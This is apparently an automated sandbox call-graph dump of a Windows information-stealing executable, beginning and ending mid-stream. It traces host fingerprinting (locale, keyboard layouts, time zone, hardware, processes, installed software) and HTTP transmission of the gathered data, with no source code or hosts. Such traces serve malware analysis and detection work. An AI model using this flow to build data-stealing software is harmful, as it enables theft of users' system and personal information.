API calls 14670->14671 14672 644a7d 14671->14672 14673 65a920 3 API calls 14672->14673 14674 644a84 14673->14674 14675 65a8a0 lstrcpy 14674->14675 14676 644a8d 14675->14676 14677 644aa3 InternetConnectA 14676->14677 14677->14633 14678 644ad3 HttpOpenRequestA 14677->14678 14680 644ebe InternetCloseHandle 14678->14680 14681 644b28 14678->14681 14680->14633 14682 65a9b0 4 API calls 14681->14682 14683 644b3c 14682->14683 14684 65a8a0 lstrcpy 14683->14684 14685 644b45 14684->14685 14686 65a920 3 API calls 14685->14686 14687 644b63 14686->14687 14688 65a8a0 lstrcpy 14687->14688 14689 644b6c 14688->14689 14690 65a9b0 4 API calls 14689->14690 14691 644b8b 14690->14691 14692 65a8a0 lstrcpy 14691->14692 14693 644b94 14692->14693 14694 65a9b0 4 API calls 14693->14694 14695 644bb5 14694->14695 14696 65a8a0 lstrcpy 14695->14696 14697 644bbe 14696->14697 14698 65a9b0 4 API calls 14697->14698 14699 644bde 14698->14699 14700 65a8a0 lstrcpy 14699->14700 14701 644be7 14700->14701 14702 65a9b0 4 API calls 14701->14702 14703 644c06 14702->14703 14704 65a8a0 lstrcpy 14703->14704 14705 644c0f 14704->14705 14706 65a920 3 API calls 14705->14706 14707 644c2d 14706->14707 14708 65a8a0 lstrcpy 14707->14708 14709 644c36 14708->14709 14710 65a9b0 4 API calls 14709->14710 14711 644c55 14710->14711 14712 65a8a0 lstrcpy 14711->14712 14713 644c5e 14712->14713 14714 65a9b0 4 API calls 14713->14714 14715 644c7d 14714->14715 14716 65a8a0 lstrcpy 14715->14716 14717 644c86 14716->14717 14718 65a920 3 API calls 14717->14718 14719 644ca4 14718->14719 14720 65a8a0 lstrcpy 14719->14720 14721 644cad 14720->14721 14722 65a9b0 4 API calls 14721->14722 14723 644ccc 14722->14723 14724 65a8a0 lstrcpy 14723->14724 14725 644cd5 14724->14725 14726 65a9b0 4 API calls 14725->14726 14727 644cf6 14726->14727 14728 65a8a0 lstrcpy 14727->14728 14729 644cff 14728->14729 14730 65a9b0 4 API calls 14729->14730 14731 644d1f 14730->14731 14732 65a8a0 lstrcpy 14731->14732 14733 644d28 14732->14733 14734 65a9b0 4 API calls 
14733->14734 14735 644d47 14734->14735 14736 65a8a0 lstrcpy 14735->14736 14737 644d50 14736->14737 14738 65a920 3 API calls 14737->14738 14739 644d6e 14738->14739 14740 65a8a0 lstrcpy 14739->14740 14741 644d77 14740->14741 14742 65a740 lstrcpy 14741->14742 14743 644d92 14742->14743 14744 65a920 3 API calls 14743->14744 14745 644db3 14744->14745 14746 65a920 3 API calls 14745->14746 14747 644dba 14746->14747 14748 65a8a0 lstrcpy 14747->14748 14749 644dc6 14748->14749 14750 644de7 lstrlen 14749->14750 14751 644dfa 14750->14751 14752 644e03 lstrlen 14751->14752 15689 65aad0 14752->15689 14754 644e13 HttpSendRequestA 14755 644e32 InternetReadFile 14754->14755 14756 644e67 InternetCloseHandle 14755->14756 14761 644e5e 14755->14761 14758 65a800 14756->14758 14758->14680 14759 65a9b0 4 API calls 14759->14761 14760 65a8a0 lstrcpy 14760->14761 14761->14755 14761->14756 14761->14759 14761->14760 15696 65aad0 14762->15696 14764 6517c4 StrCmpCA 14765 6517cf ExitProcess 14764->14765 14767 6517d7 14764->14767 14766 6519c2 14766->13685 14767->14766 14768 6518ad StrCmpCA 14767->14768 14769 6518cf StrCmpCA 14767->14769 14770 6518f1 StrCmpCA 14767->14770 14771 651951 StrCmpCA 14767->14771 14772 651970 StrCmpCA 14767->14772 14773 651913 StrCmpCA 14767->14773 14774 651932 StrCmpCA 14767->14774 14775 65185d StrCmpCA 14767->14775 14776 65187f StrCmpCA 14767->14776 14777 65a820 lstrlen lstrcpy 14767->14777 14768->14767 14769->14767 14770->14767 14771->14767 14772->14767 14773->14767 14774->14767 14775->14767 14776->14767 14777->14767 14779 65a7a0 lstrcpy 14778->14779 14780 645979 14779->14780 14781 6447b0 2 API calls 14780->14781 14782 645985 14781->14782 14783 65a740 lstrcpy 14782->14783 14784 6459ba 14783->14784 14785 65a740 lstrcpy 14784->14785 14786 6459c7 14785->14786 14787 65a740 lstrcpy 14786->14787 14788 6459d4 14787->14788 14789 65a740 lstrcpy 14788->14789 14790 6459e1 14789->14790 14791 65a740 lstrcpy 14790->14791 14792 6459ee InternetOpenA StrCmpCA 14791->14792 14793 645a1d 
14792->14793 14794 645fc3 InternetCloseHandle 14793->14794 14795 658b60 3 API calls 14793->14795 14796 645fe0 14794->14796 14797 645a3c 14795->14797 14799 649ac0 4 API calls 14796->14799 14798 65a920 3 API calls 14797->14798 14800 645a4f 14798->14800 14801 645fe6 14799->14801 14802 65a8a0 lstrcpy 14800->14802 14803 65a820 2 API calls 14801->14803 14805 64601f codecvt 14801->14805 14808 645a58 14802->14808 14804 645ffd 14803->14804 14806 65a9b0 4 API calls 14804->14806 14810 65a7a0 lstrcpy 14805->14810 14807 646013 14806->14807 14809 65a8a0 lstrcpy 14807->14809 14811 65a9b0 4 API calls 14808->14811 14809->14805 14819 64604f 14810->14819 14812 645a82 14811->14812 14813 65a8a0 lstrcpy 14812->14813 14814 645a8b 14813->14814 14815 65a9b0 4 API calls 14814->14815 14816 645aaa 14815->14816 14817 65a8a0 lstrcpy 14816->14817 14818 645ab3 14817->14818 14820 65a920 3 API calls 14818->14820 14819->13691 14821 645ad1 14820->14821 14822 65a8a0 lstrcpy 14821->14822 14823 645ada 14822->14823 14824 65a9b0 4 API calls 14823->14824 14825 645af9 14824->14825 14826 65a8a0 lstrcpy 14825->14826 14827 645b02 14826->14827 14828 65a9b0 4 API calls 14827->14828 14829 645b21 14828->14829 14830 65a8a0 lstrcpy 14829->14830 14831 645b2a 14830->14831 14832 65a9b0 4 API calls 14831->14832 14833 645b56 14832->14833 14834 65a920 3 API calls 14833->14834 14835 645b5d 14834->14835 14836 65a8a0 lstrcpy 14835->14836 14837 645b66 14836->14837 14838 645b7c InternetConnectA 14837->14838 14838->14794 14839 645bac HttpOpenRequestA 14838->14839 14841 645fb6 InternetCloseHandle 14839->14841 14842 645c0b 14839->14842 14841->14794 14843 65a9b0 4 API calls 14842->14843 14844 645c1f 14843->14844 14845 65a8a0 lstrcpy 14844->14845 14846 645c28 14845->14846 14847 65a920 3 API calls 14846->14847 14848 645c46 14847->14848 14849 65a8a0 lstrcpy 14848->14849 14850 645c4f 14849->14850 14851 65a9b0 4 API calls 14850->14851 14852 645c6e 14851->14852 14853 65a8a0 lstrcpy 14852->14853 14854 645c77 14853->14854 14855 65a9b0 4 
API calls 14854->14855 14856 645c98 14855->14856 14857 65a8a0 lstrcpy 14856->14857 14858 645ca1 14857->14858 14859 65a9b0 4 API calls 14858->14859 14860 645cc1 14859->14860 14861 65a8a0 lstrcpy 14860->14861 14862 645cca 14861->14862 14863 65a9b0 4 API calls 14862->14863 14864 645ce9 14863->14864 14865 65a8a0 lstrcpy 14864->14865 14866 645cf2 14865->14866 14867 65a920 3 API calls 14866->14867 14868 645d10 14867->14868 14869 65a8a0 lstrcpy 14868->14869 14870 645d19 14869->14870 14871 65a9b0 4 API calls 14870->14871 14872 645d38 14871->14872 14873 65a8a0 lstrcpy 14872->14873 14874 645d41 14873->14874 14875 65a9b0 4 API calls 14874->14875 14876 645d60 14875->14876 14877 65a8a0 lstrcpy 14876->14877 14878 645d69 14877->14878 14879 65a920 3 API calls 14878->14879 14880 645d87 14879->14880 14881 65a8a0 lstrcpy 14880->14881 14882 645d90 14881->14882 14883 65a9b0 4 API calls 14882->14883 14884 645daf 14883->14884 14885 65a8a0 lstrcpy 14884->14885 14886 645db8 14885->14886 14887 65a9b0 4 API calls 14886->14887 14888 645dd9 14887->14888 14889 65a8a0 lstrcpy 14888->14889 14890 645de2 14889->14890 14891 65a9b0 4 API calls 14890->14891 14892 645e02 14891->14892 14893 65a8a0 lstrcpy 14892->14893 14894 645e0b 14893->14894 14895 65a9b0 4 API calls 14894->14895 14896 645e2a 14895->14896 14897 65a8a0 lstrcpy 14896->14897 14898 645e33 14897->14898 14899 65a920 3 API calls 14898->14899 14900 645e54 14899->14900 14901 65a8a0 lstrcpy 14900->14901 14902 645e5d 14901->14902 14903 645e70 lstrlen 14902->14903 15697 65aad0 14903->15697 14905 645e81 lstrlen GetProcessHeap RtlAllocateHeap 15698 65aad0 14905->15698 14907 645eae lstrlen 14908 645ebe 14907->14908 14909 645ed7 lstrlen 14908->14909 14910 645ee7 14909->14910 14911 645ef0 lstrlen 14910->14911 14912 645f03 14911->14912 14913 645f1a lstrlen 14912->14913 15699 65aad0 14913->15699 14915 645f2a HttpSendRequestA 14916 645f35 InternetReadFile 14915->14916 14917 645f6a InternetCloseHandle 14916->14917 14921 645f61 14916->14921 14917->14841 
14919 65a9b0 4 API calls 14919->14921 14920 65a8a0 lstrcpy 14920->14921 14921->14916 14921->14917 14921->14919 14921->14920 14923 651077 14922->14923 14924 651151 14923->14924 14925 65a820 lstrlen lstrcpy 14923->14925 14924->13693 14925->14923 14927 650db7 14926->14927 14928 650f17 14927->14928 14929 650ea4 StrCmpCA 14927->14929 14930 650e27 StrCmpCA 14927->14930 14931 650e67 StrCmpCA 14927->14931 14932 65a820 lstrlen lstrcpy 14927->14932 14928->13701 14929->14927 14930->14927 14931->14927 14932->14927 14936 650f67 14933->14936 14934 651044 14934->13709 14935 650fb2 StrCmpCA 14935->14936 14936->14934 14936->14935 14937 65a820 lstrlen lstrcpy 14936->14937 14937->14936 14939 65a740 lstrcpy 14938->14939 14940 651a26 14939->14940 14941 65a9b0 4 API calls 14940->14941 14942 651a37 14941->14942 14943 65a8a0 lstrcpy 14942->14943 14944 651a40 14943->14944 14945 65a9b0 4 API calls 14944->14945 14946 651a5b 14945->14946 14947 65a8a0 lstrcpy 14946->14947 14948 651a64 14947->14948 14949 65a9b0 4 API calls 14948->14949 14950 651a7d 14949->14950 14951 65a8a0 lstrcpy 14950->14951 14952 651a86 14951->14952 14953 65a9b0 4 API calls 14952->14953 14954 651aa1 14953->14954 14955 65a8a0 lstrcpy 14954->14955 14956 651aaa 14955->14956 14957 65a9b0 4 API calls 14956->14957 14958 651ac3 14957->14958 14959 65a8a0 lstrcpy 14958->14959 14960 651acc 14959->14960 14961 65a9b0 4 API calls 14960->14961 14962 651ae7 14961->14962 14963 65a8a0 lstrcpy 14962->14963 14964 651af0 14963->14964 14965 65a9b0 4 API calls 14964->14965 14966 651b09 14965->14966 14967 65a8a0 lstrcpy 14966->14967 14968 651b12 14967->14968 14969 65a9b0 4 API calls 14968->14969 14970 651b2d 14969->14970 14971 65a8a0 lstrcpy 14970->14971 14972 651b36 14971->14972 14973 65a9b0 4 API calls 14972->14973 14974 651b4f 14973->14974 14975 65a8a0 lstrcpy 14974->14975 14976 651b58 14975->14976 14977 65a9b0 4 API calls 14976->14977 14978 651b76 14977->14978 14979 65a8a0 lstrcpy 14978->14979 14980 651b7f 14979->14980 14981 657500 6 API 
calls 14980->14981 14982 651b96 14981->14982 14983 65a920 3 API calls 14982->14983 14984 651ba9 14983->14984 14985 65a8a0 lstrcpy 14984->14985 14986 651bb2 14985->14986 14987 65a9b0 4 API calls 14986->14987 14988 651bdc 14987->14988 14989 65a8a0 lstrcpy 14988->14989 14990 651be5 14989->14990 14991 65a9b0 4 API calls 14990->14991 14992 651c05 14991->14992 14993 65a8a0 lstrcpy 14992->14993 14994 651c0e 14993->14994 15700 657690 GetProcessHeap RtlAllocateHeap 14994->15700 14997 65a9b0 4 API calls 14998 651c2e 14997->14998 14999 65a8a0 lstrcpy 14998->14999 15000 651c37 14999->15000 15001 65a9b0 4 API calls 15000->15001 15002 651c56 15001->15002 15003 65a8a0 lstrcpy 15002->15003 15004 651c5f 15003->15004 15005 65a9b0 4 API calls 15004->15005 15006 651c80 15005->15006 15007 65a8a0 lstrcpy 15006->15007 15008 651c89 15007->15008 15707 6577c0 GetCurrentProcess IsWow64Process 15008->15707 15011 65a9b0 4 API calls 15012 651ca9 15011->15012 15013 65a8a0 lstrcpy 15012->15013 15014 651cb2 15013->15014 15015 65a9b0 4 API calls 15014->15015 15016 651cd1 15015->15016 15017 65a8a0 lstrcpy 15016->15017 15018 651cda 15017->15018 15019 65a9b0 4 API calls 15018->15019 15020 651cfb 15019->15020 15021 65a8a0 lstrcpy 15020->15021 15022 651d04 15021->15022 15023 657850 3 API calls 15022->15023 15024 651d14 15023->15024 15025 65a9b0 4 API calls 15024->15025 15026 651d24 15025->15026 15027 65a8a0 lstrcpy 15026->15027 15028 651d2d 15027->15028 15029 65a9b0 4 API calls 15028->15029 15030 651d4c 15029->15030 15031 65a8a0 lstrcpy 15030->15031 15032 651d55 15031->15032 15033 65a9b0 4 API calls 15032->15033 15034 651d75 15033->15034 15035 65a8a0 lstrcpy 15034->15035 15036 651d7e 15035->15036 15037 6578e0 3 API calls 15036->15037 15038 651d8e 15037->15038 15039 65a9b0 4 API calls 15038->15039 15040 651d9e 15039->15040 15041 65a8a0 lstrcpy 15040->15041 15042 651da7 15041->15042 15043 65a9b0 4 API calls 15042->15043 15044 651dc6 15043->15044 15045 65a8a0 lstrcpy 15044->15045 15046 651dcf 15045->15046 
15047 65a9b0 4 API calls 15046->15047 15048 651df0 15047->15048 15049 65a8a0 lstrcpy 15048->15049 15050 651df9 15049->15050 15709 657980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15050->15709 15053 65a9b0 4 API calls 15054 651e19 15053->15054 15055 65a8a0 lstrcpy 15054->15055 15056 651e22 15055->15056 15057 65a9b0 4 API calls 15056->15057 15058 651e41 15057->15058 15059 65a8a0 lstrcpy 15058->15059 15060 651e4a 15059->15060 15061 65a9b0 4 API calls 15060->15061 15062 651e6b 15061->15062 15063 65a8a0 lstrcpy 15062->15063 15064 651e74 15063->15064 15711 657a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15064->15711 15067 65a9b0 4 API calls 15068 651e94 15067->15068 15069 65a8a0 lstrcpy 15068->15069 15070 651e9d 15069->15070 15071 65a9b0 4 API calls 15070->15071 15072 651ebc 15071->15072 15073 65a8a0 lstrcpy 15072->15073 15074 651ec5 15073->15074 15075 65a9b0 4 API calls 15074->15075 15076 651ee5 15075->15076 15077 65a8a0 lstrcpy 15076->15077 15078 651eee 15077->15078 15714 657b00 GetUserDefaultLocaleName 15078->15714 15081 65a9b0 4 API calls 15082 651f0e 15081->15082 15083 65a8a0 lstrcpy 15082->15083 15084 651f17 15083->15084 15085 65a9b0 4 API calls 15084->15085 15086 651f36 15085->15086 15087 65a8a0 lstrcpy 15086->15087 15088 651f3f 15087->15088 15089 65a9b0 4 API calls 15088->15089 15090 651f60 15089->15090 15091 65a8a0 lstrcpy 15090->15091 15092 651f69 15091->15092 15718 657b90 15092->15718 15094 651f80 15095 65a920 3 API calls 15094->15095 15096 651f93 15095->15096 15097 65a8a0 lstrcpy 15096->15097 15098 651f9c 15097->15098 15099 65a9b0 4 API calls 15098->15099 15100 651fc6 15099->15100 15101 65a8a0 lstrcpy 15100->15101 15102 651fcf 15101->15102 15103 65a9b0 4 API calls 15102->15103 15104 651fef 15103->15104 15105 65a8a0 lstrcpy 15104->15105 15106 651ff8 15105->15106 15730 657d80 GetSystemPowerStatus 15106->15730 15109 65a9b0 4 API calls 15110 652018 15109->15110 15111 65a8a0 lstrcpy 15110->15111 15112 652021 15111->15112 15113 65a9b0 4 API 
calls 15112->15113 15114 652040 15113->15114 15115 65a8a0 lstrcpy 15114->15115 15116 652049 15115->15116 15117 65a9b0 4 API calls 15116->15117 15118 65206a 15117->15118 15119 65a8a0 lstrcpy 15118->15119 15120 652073 15119->15120 15121 65207e GetCurrentProcessId 15120->15121 15732 659470 OpenProcess 15121->15732 15124 65a920 3 API calls 15125 6520a4 15124->15125 15126 65a8a0 lstrcpy 15125->15126 15127 6520ad 15126->15127 15128 65a9b0 4 API calls 15127->15128 15129 6520d7 15128->15129 15130 65a8a0 lstrcpy 15129->15130 15131 6520e0 15130->15131 15132 65a9b0 4 API calls 15131->15132 15133 652100 15132->15133 15134 65a8a0 lstrcpy 15133->15134 15135 652109 15134->15135 15737 657e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15135->15737 15138 65a9b0 4 API calls 15139 652129 15138->15139 15140 65a8a0 lstrcpy 15139->15140 15141 652132 15140->15141 15142 65a9b0 4 API calls 15141->15142 15143 652151 15142->15143 15144 65a8a0 lstrcpy 15143->15144 15145 65215a 15144->15145 15146 65a9b0 4 API calls 15145->15146 15147 65217b 15146->15147 15148 65a8a0 lstrcpy 15147->15148 15149 652184 15148->15149 15741 657f60 15149->15741 15152 65a9b0 4 API calls 15153 6521a4 15152->15153 15154 65a8a0 lstrcpy 15153->15154 15155 6521ad 15154->15155 15156 65a9b0 4 API calls 15155->15156 15157 6521cc 15156->15157 15158 65a8a0 lstrcpy 15157->15158 15159 6521d5 15158->15159 15160 65a9b0 4 API calls 15159->15160 15161 6521f6 15160->15161 15162 65a8a0 lstrcpy 15161->15162 15163 6521ff 15162->15163 15754 657ed0 GetSystemInfo wsprintfA 15163->15754 15166 65a9b0 4 API calls 15167 65221f 15166->15167 15168 65a8a0 lstrcpy 15167->15168 15169 652228 15168->15169 15170 65a9b0 4 API calls 15169->15170 15171 652247 15170->15171 15172 65a8a0 lstrcpy 15171->15172 15173 652250 15172->15173 15174 65a9b0 4 API calls 15173->15174 15175 652270 15174->15175 15176 65a8a0 lstrcpy 15175->15176 15177 652279 15176->15177 15756 658100 GetProcessHeap RtlAllocateHeap 15177->15756 15180 65a9b0 4 API calls 15181 652299 
15180->15181 15182 65a8a0 lstrcpy 15181->15182 15183 6522a2 15182->15183 15184 65a9b0 4 API calls 15183->15184 15185 6522c1 15184->15185 15186 65a8a0 lstrcpy 15185->15186 15187 6522ca 15186->15187 15188 65a9b0 4 API calls 15187->15188 15189 6522eb 15188->15189 15190 65a8a0 lstrcpy 15189->15190 15191 6522f4 15190->15191 15762 6587c0 15191->15762 15194 65a920 3 API calls 15195 65231e 15194->15195 15196 65a8a0 lstrcpy 15195->15196 15197 652327 15196->15197 15198 65a9b0 4 API calls 15197->15198 15199 652351 15198->15199 15200 65a8a0 lstrcpy 15199->15200 15201 65235a 15200->15201 15202 65a9b0 4 API calls 15201->15202 15203 65237a 15202->15203 15204 65a8a0 lstrcpy 15203->15204 15205 652383 15204->15205 15206 65a9b0 4 API calls 15205->15206 15207 6523a2 15206->15207 15208 65a8a0 lstrcpy 15207->15208 15209 6523ab 15208->15209 15767 6581f0 15209->15767 15211 6523c2 15212 65a920 3 API calls 15211->15212 15213 6523d5 15212->15213 15214 65a8a0 lstrcpy 15213->15214 15215 6523de 15214->15215 15216 65a9b0 4 API calls 15215->15216 15217 65240a 15216->15217 15218 65a8a0 lstrcpy 15217->15218 15219 652413 15218->15219 15220 65a9b0 4 API calls 15219->15220 15221 652432 15220->15221 15222 65a8a0 lstrcpy 15221->15222 15223 65243b 15222->15223 15224 65a9b0 4 API calls 15223->15224 15225 65245c 15224->15225 15226 65a8a0 lstrcpy 15225->15226 15227 652465 15226->15227 15228 65a9b0 4 API calls 15227->15228 15229 652484 15228->15229 15230 65a8a0 lstrcpy 15229->15230 15231 65248d 15230->15231 15232 65a9b0 4 API calls 15231->15232 15233 6524ae 15232->15233 15234 65a8a0 lstrcpy 15233->15234 15235 6524b7 15234->15235 15775 658320 15235->15775 15237 6524d3 15238 65a920 3 API calls 15237->15238 15239 6524e6 15238->15239 15240 65a8a0 lstrcpy 15239->15240 15241 6524ef 15240->15241 15242 65a9b0 4 API calls 15241->15242 15243 652519 15242->15243 15244 65a8a0 lstrcpy 15243->15244 15245 652522 15244->15245 15246 65a9b0 4 API calls 15245->15246 15247 652543 15246->15247 15248 65a8a0 lstrcpy 15247->15248 
15249 65254c 15248->15249 15250 658320 17 API calls 15249->15250 15251 652568 15250->15251 15252 65a920 3 API calls 15251->15252 15253 65257b 15252->15253 15254 65a8a0 lstrcpy 15253->15254 15255 652584 15254->15255 15256 65a9b0 4 API calls 15255->15256 15257 6525ae 15256->15257 15258 65a8a0 lstrcpy 15257->15258 15259 6525b7 15258->15259 15260 65a9b0 4 API calls 15259->15260 15261 6525d6 15260->15261 15262 65a8a0 lstrcpy 15261->15262 15263 6525df 15262->15263 15264 65a9b0 4 API calls 15263->15264 15265 652600 15264->15265 15266 65a8a0 lstrcpy 15265->15266 15267 652609 15266->15267 15811 658680 15267->15811 15269 652620 15270 65a920 3 API calls 15269->15270 15271 652633 15270->15271 15272 65a8a0 lstrcpy 15271->15272 15273 65263c 15272->15273 15274 65265a lstrlen 15273->15274 15275 65266a 15274->15275 15276 65a740 lstrcpy 15275->15276 15277 65267c 15276->15277 15278 641590 lstrcpy 15277->15278 15279 65268d 15278->15279 15821 655190 15279->15821 15281 652699 15281->13713 16009 65aad0 15282->16009 15284 645009 InternetOpenUrlA 15285 645021 15284->15285 15286 6450a0 InternetCloseHandle InternetCloseHandle 15285->15286 15287 64502a InternetReadFile 15285->15287 15288 6450ec 15286->15288 15287->15285 15288->13717 16010 6498d0 15289->16010 15291 650759 15292 65077d 15291->15292 15293 650a38 15291->15293 15295 650799 StrCmpCA 15292->15295 15294 641590 lstrcpy 15293->15294 15296 650a49 15294->15296 15297 6507a8 15295->15297 15322 650843 15295->15322 16186 650250 15296->16186 15300 65a7a0 lstrcpy 15297->15300 15302 6507c3 15300->15302 15301 650865 StrCmpCA 15303 650874 15301->15303 15341 65096b 15301->15341 15304 641590 lstrcpy 15302->15304 15305 65a740 lstrcpy 15303->15305 15306 65080c 15304->15306 15308 650881 15305->15308 15309 65a7a0 lstrcpy 15306->15309 15307 65099c StrCmpCA 15310 6509ab 15307->15310 15330 650a2d 15307->15330 15311 65a9b0 4 API calls 15308->15311 15312 650823 15309->15312 15314 641590 lstrcpy 15310->15314 15315 6508ac 15311->15315 15313 65a7a0 lstrcpy 
15312->15313 15316 65083e 15313->15316 15317 6509f4 15314->15317 15318 65a920 3 API calls 15315->15318 16013 64fb00 15316->16013 15320 65a7a0 lstrcpy 15317->15320 15321 6508b3 15318->15321 15323 650a0d 15320->15323 15324 65a9b0 4 API calls 15321->15324 15322->15301 15325 65a7a0 lstrcpy 15323->15325 15326 6508ba 15324->15326 15328 650a28 15325->15328 16129 650030 15328->16129 15330->13721 15341->15307 15661 65a7a0 lstrcpy 15660->15661 15662 641683 15661->15662 15663 65a7a0 lstrcpy 15662->15663 15664 641695 15663->15664 15665 65a7a0 lstrcpy 15664->15665 15666 6416a7 15665->15666 15667 65a7a0 lstrcpy 15666->15667 15668 6415a3 15667->15668 15668->14544 15670 6447c6 15669->15670 15671 644838 lstrlen 15670->15671 15695 65aad0 15671->15695 15673 644848 InternetCrackUrlA 15674 644867 15673->15674 15674->14621 15676 65a740 lstrcpy 15675->15676 15677 658b74 15676->15677 15678 65a740 lstrcpy 15677->15678 15679 658b82 GetSystemTime 15678->15679 15681 658b99 15679->15681 15680 65a7a0 lstrcpy 15682 658bfc 15680->15682 15681->15680 15682->14636 15685 65a931 15683->15685 15684 65a988 15686 65a7a0 lstrcpy 15684->15686 15685->15684 15687 65a968 lstrcpy lstrcat 15685->15687 15688 65a994 15686->15688 15687->15684 15688->14639 15689->14754 15691 649af9 LocalAlloc 15690->15691 15692 644eee 15690->15692 15691->15692 15693 649b14 CryptStringToBinaryA 15691->15693 15692->14642 15692->14645 15693->15692 15694 649b39 LocalFree 15693->15694 15694->15692 15695->15673 15696->14764 15697->14905 15698->14907 15699->14915 15828 6577a0 15700->15828 15703 6576c6 RegOpenKeyExA 15705 657704 RegCloseKey 15703->15705 15706 6576e7 RegQueryValueExA 15703->15706 15704 651c1e 15704->14997 15705->15704 15706->15705 15708 651c99 15707->15708 15708->15011 15710 651e09 15709->15710 15710->15053 15712 651e84 15711->15712 15713 657a9a wsprintfA 15711->15713 15712->15067 15713->15712 15715 657b4d 15714->15715 15716 651efe 15714->15716 15835 658d20 LocalAlloc CharToOemW 15715->15835 15716->15081 15719 65a740 
lstrcpy 15718->15719 15720 657bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15719->15720 15727 657c25 15720->15727 15721 657c46 GetLocaleInfoA 15721->15727 15722 657d18 15723 657d1e LocalFree 15722->15723 15724 657d28 15722->15724 15723->15724 15726 65a7a0 lstrcpy 15724->15726 15725 65a9b0 lstrcpy lstrlen lstrcpy lstrcat 15725->15727 15729 657d37 15726->15729 15727->15721 15727->15722 15727->15725 15728 65a8a0 lstrcpy 15727->15728 15728->15727 15729->15094 15731 652008 15730->15731 15731->15109 15733 6594b5 15732->15733 15734 659493 GetModuleFileNameExA CloseHandle 15732->15734 15735 65a740 lstrcpy 15733->15735 15734->15733 15736 652091 15735->15736 15736->15124 15738 657e68 RegQueryValueExA 15737->15738 15740 652119 15737->15740 15739 657e8e RegCloseKey 15738->15739 15739->15740 15740->15138 15742 657fb9 GetLogicalProcessorInformationEx 15741->15742 15743 657fd8 GetLastError 15742->15743 15744 658029 15742->15744 15747 658022 15743->15747 15753 657fe3 15743->15753 15749 6589f0 2 API calls 15744->15749 15748 652194 15747->15748 15750 6589f0 2 API calls 15747->15750 15748->15152 15751 65807b 15749->15751 15750->15748 15751->15747 15752 658084 wsprintfA 15751->15752 15752->15748 15753->15742 15753->15748 15836 6589f0 15753->15836 15839 658a10 GetProcessHeap RtlAllocateHeap 15753->15839 15755 65220f 15754->15755 15755->15166 15757 6589b0 15756->15757 15758 65814d GlobalMemoryStatusEx 15757->15758 15761 658163 __aulldiv 15758->15761 15759 65819b wsprintfA 15760 652289 15759->15760 15760->15180 15761->15759 15763 6587fb GetProcessHeap RtlAllocateHeap wsprintfA 15762->15763 15765 65a740 lstrcpy 15763->15765 15766 65230b 15765->15766 15766->15194 15768 65a740 lstrcpy 15767->15768 15774 658229 15768->15774 15769 658263 15770 65a7a0 lstrcpy 15769->15770 15772 6582dc 15770->15772 15771 65a9b0 lstrcpy lstrlen lstrcpy lstrcat 15771->15774 15772->15211 15773 65a8a0 lstrcpy 15773->15774 15774->15769 15774->15771 15774->15773 15776 65a740 lstrcpy 15775->15776 15777 
65835c RegOpenKeyExA 15776->15777 15778 6583d0 15777->15778 15779 6583ae 15777->15779 15781 658613 RegCloseKey 15778->15781 15782 6583f8 RegEnumKeyExA 15778->15782 15780 65a7a0 lstrcpy 15779->15780 15791 6583bd 15780->15791 15785 65a7a0 lstrcpy 15781->15785 15783 65843f wsprintfA RegOpenKeyExA 15782->15783 15784 65860e 15782->15784 15786 658485 RegCloseKey RegCloseKey 15783->15786 15787 6584c1 RegQueryValueExA 15783->15787 15784->15781 15785->15791 15788 65a7a0 lstrcpy 15786->15788 15789 658601 RegCloseKey 15787->15789 15790 6584fa lstrlen 15787->15790 15788->15791 15789->15784 15790->15789 15792 658510 15790->15792 15791->15237 15793 65a9b0 4 API calls 15792->15793 15794 658527 15793->15794 15795 65a8a0 lstrcpy 15794->15795 15796 658533 15795->15796 15797 65a9b0 4 API calls 15796->15797 15798 658557 15797->15798 15799 65a8a0 lstrcpy 15798->15799 15800 658563 15799->15800 15801 65856e RegQueryValueExA 15800->15801 15801->15789 15802 6585a3 15801->15802 15803 65a9b0 4 API calls 15802->15803 15804 6585ba 15803->15804 15805 65a8a0 lstrcpy 15804->15805 15806 6585c6 15805->15806 15807 65a9b0 4 API calls 15806->15807 15808 6585ea 15807->15808 15809 65a8a0 lstrcpy 15808->15809 15810 6585f6 15809->15810 15810->15789 15812 65a740 lstrcpy 15811->15812 15813 6586bc CreateToolhelp32Snapshot Process32First 15812->15813 15814 65875d CloseHandle 15813->15814 15815 6586e8 Process32Next 15813->15815 15816 65a7a0 lstrcpy 15814->15816 15815->15814 15820 6586fd 15815->15820 15819 658776 15816->15819 15817 65a9b0 lstrcpy lstrlen lstrcpy lstrcat 15817->15820 15818 65a8a0 lstrcpy 15818->15820 15819->15269 15820->15815 15820->15817 15820->15818 15822 65a7a0 lstrcpy 15821->15822 15823 6551b5 15822->15823 15824 641590 lstrcpy 15823->15824 15825 6551c6 15824->15825 15840 645100 15825->15840 15827 6551cf 15827->15281 15831 657720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15828->15831 15830 6576b9 15830->15703 15830->15704 15832 657765 RegQueryValueExA 15831->15832 15833 657780 RegCloseKey 
15831->15833 15832->15833 15834 657793 15833->15834 15834->15830 15835->15716 15837 658a0c 15836->15837 15838 6589f9 GetProcessHeap HeapFree 15836->15838 15837->15753 15838->15837 15839->15753 15841 65a7a0 lstrcpy 15840->15841 15842 645119 15841->15842 15843 6447b0 2 API calls 15842->15843 15844 645125 15843->15844 16000 658ea0 15844->16000 15846 645184 15847 645192 lstrlen 15846->15847 15848 6451a5 15847->15848 15849 658ea0 4 API calls 15848->15849 15850 6451b6 15849->15850 15851 65a740 lstrcpy 15850->15851 15852 6451c9 15851->15852 15853 65a740 lstrcpy 15852->15853 15854 6451d6 15853->15854 15855 65a740 lstrcpy 15854->15855 15856 6451e3 15855->15856 15857 65a740 lstrcpy 15856->15857 15858 6451f0 15857->15858 15859 65a740 lstrcpy 15858->15859 15860 6451fd InternetOpenA StrCmpCA 15859->15860 15861 64522f 15860->15861 15862 6458c4 InternetCloseHandle 15861->15862 15863 658b60 3 API calls 15861->15863 15869 6458d9 codecvt 15862->15869 15864 64524e 15863->15864 15865 65a920 3 API calls 15864->15865 15866 645261 15865->15866 15867 65a8a0 lstrcpy 15866->15867 15868 64526a 15867->15868 15870 65a9b0 4 API calls 15868->15870 15873 65a7a0 lstrcpy 15869->15873 15871 6452ab 15870->15871 15872 65a920 3 API calls 15871->15872 15874 6452b2 15872->15874 15881 645913 15873->15881 15875 65a9b0 4 API calls 15874->15875 15876 6452b9 15875->15876 15877 65a8a0 lstrcpy 